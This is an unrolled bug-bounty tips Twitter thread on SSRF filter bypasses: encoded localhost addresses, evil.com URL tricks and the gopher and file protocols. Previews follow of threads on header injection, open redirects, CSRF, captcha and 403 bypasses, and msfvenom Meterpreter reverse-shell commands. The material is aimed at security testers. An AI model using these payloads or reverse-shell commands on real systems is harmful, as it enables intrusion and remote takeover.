Abhishek Meena Profile picture
Oct 31 6 tweets 3 min read
Server Side Request Forgery(SSRF)
#bugbounty #infosec

🧵: (1/n) ⬇⬇⬇
🏹Use Different Encoding Schemes of https://127.O.O.1

➡Hex Encoding https://Ox7f.OxO.OxO.Ox1
➡Octal Encoding https://0177.O.O.01
➡Dword Encoding https://2130706433
➡URL Encoding ➡https://%6c%6f%63%61%6c%68%6f%73%74
➡Mixed Encoding https://0177.O.O.Ox1

🧵: (2/n) :👇
🏹Use The Whole IP Range For Testing SSRF
(198.0.0.1-255) #bugbounty
. . .
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)

🏹Use Registered Domain Names That Resolves To 127.0.0.1

🏹Embed Credentials : https://attacker@victim.com

🧵: (3/n) :👇
🏹Use URL Fragments '#' : https://attacker'#'victim.com
(Remome the '' over the hash)

🏹Use DNS Subdomain Method :
https ://victim.com.evil.com

🏹Use Directory Method :
https ://attacker.com/victim.com

🏹Exploit Redirecting The Target

🧵: (4/n) :👇 #bugbounty
🏹Change The Referrer To Burp Collaborator [Blind Exploit) #bugbounty #bugbountytips #SSRF #infosec

🏹Use IPv6 addresses instead of IPv4

🏹Usable Protocols:
▪gopher : //
▪file: //
▪dict://
▪sftp://
Thank You so much For
Reading thread on SSRF😀🤗

Hope you like it

You can join my bug bounty tips telegram group if you want : ↙
t.me/bugbountyresou…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Abhishek Meena

Abhishek Meena Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @Aacle_

Nov 2
Header Injection 🌵🌱 #bugbounty
#infosec #bugbountytips

🧵(1/n) :👇🏻 Header Injection
🏹 Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console

Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:

🏹Try to repeat same Host header 2 times
Host: legit.com
Stuff: stuff
Host: evil.com

#bugbounty #infosec
Read 12 tweets
Nov 1
Reverse-shells🔥🌵 #bugbounty #infosec

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: #bugbountytips

See🧵(1/n) :👇🏻
🏹For Windows : #bugbounty #infosec

➡Meterpreter #Reverse_shells

▪msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe

▪use exploit/multi/handler &
set payload windows/meterpreter/reverse_tcp Image
➡Meterpreter HTTPS #bugbounty #infosec

It is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

▪msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe Image
Read 16 tweets
Oct 31
Open Redirection 🔥 #bugbounty

Arises when Application incorporates user-controllable data into target of a redirection in an unsafe way.

▪ Where to find
➡Sometimes it can be found in login / register / logout pages
➡Checking the javascript source code

How to exploit 👇
🏹Change the domain
/?redir=evil.com

🏹Using a whitelisted domain or keyword
/?redir=target.com.evil.com

🏹Using // to bypass http blacklisted keyword
/?redir=//evil.com

🏹Using https: to bypass // blacklisted keyword
/?redir=https:evil.com
🏹Using \\ to bypass // blacklisted keyword
/?redir=\\evil.com

🏹Using \/\/ to bypass // blacklisted keyword
/?redir=\/\/evil.com/
/?redir=/\/evil.com/

🏹Using %E3%80%82 to bypass . blacklisted character
/?redir=evil。com
/?redir=evil%E3%80%82com

#bugbountytips
Read 9 tweets
Oct 31
Bypass CSRF🔥#bugbountytips

➡Change single character
➡Sending empty value of token
➡Replace the token with same length
➡Changing POST / GET method
➡Remove the token from request
➡Use another user's valid token
➡Try to decrypt hash

#bugbounty #infosec

More in Detail :👇
▪ Change single character of Parameter token #bugbounty #CSRF
. . .

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456&token=aaaaaaaaab
▪ Sending empty value of token #bugbounty #bugboutnytips #CSRF
. . .

POST /register HTTP/1.1
Host: target.com
...

username=dapos&password=123456&token=aaaaaaaaaa

To

username=dapos&password=123456&token=
Read 10 tweets
Oct 30
🔥Bypass Captcha🤗(Google reCAPTCHA) #bugbounty

➡Try changing the request method, for example POST to GET
➡Try remove the value of the captcha parameter
➡Try reuse old captcha token
➡Convert JSON data to normal request parameter

#bugbountytips #infosec

More in Detail :👇🏻
🏹Try changing the request method, for example POST to GET #bugbounty #bugbountytips
. . .
POST / HTTP 1.1
Host: target.com

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=yyyyyy&_Password=zzzzzzzz
. . .

Bypass by Changing the POST method to GET
🏹Try remove the value of the captcha parameter
. . . #bugbounty #infosec

POST / HTTP 1.1
Host: target.com

_RequestVerificationToken=&_Username=daffa&_Password=test123

Bypass by removing value of captcha
Read 8 tweets
Oct 30
🎆Bypass 403🎆 #bugbountytips

➡Using "X-Original-URL" header
➡Appending %2e after the first slash
➡Try add dot (.) slash (/) and semicolon (;) in the URL
➡Add "..;/" after the directory name
➡Try to uppercase the alphabet in the url

#bugbounty #infosec🤗

More Detail :👇🏻
🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: target.com

Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: https://t.co/GdtCkHfF3G
X-Original-URL: /admin
🏹Appending %2e after the first slash
. . .
Request :
target.com/admin => 403

Try to Bypass with
. . .
target.com/%2e/admin => 200
Read 7 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(